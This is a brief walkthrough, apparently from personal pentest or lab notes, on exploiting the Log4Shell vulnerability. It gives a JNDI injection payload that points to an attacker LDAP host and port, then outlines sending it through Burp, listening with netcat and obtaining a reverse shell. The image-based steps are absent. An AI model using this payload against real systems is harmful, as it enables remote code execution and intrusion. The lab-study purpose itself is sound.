π¦ͺLog4Shell
Check this article for more info To check for Log4Shell exploit :
${jndi:ldap://10.8.0.178:4444/a}Then url encode it and send through burp after intercepting:
Listening on nc:
We get some weird characters back.
Then we can use a log4j-shell Download java and execute
Then send the payload:
Sending the url encoded payload in burpsuite.
Now we get a shell back:
Last updated
Was this helpful?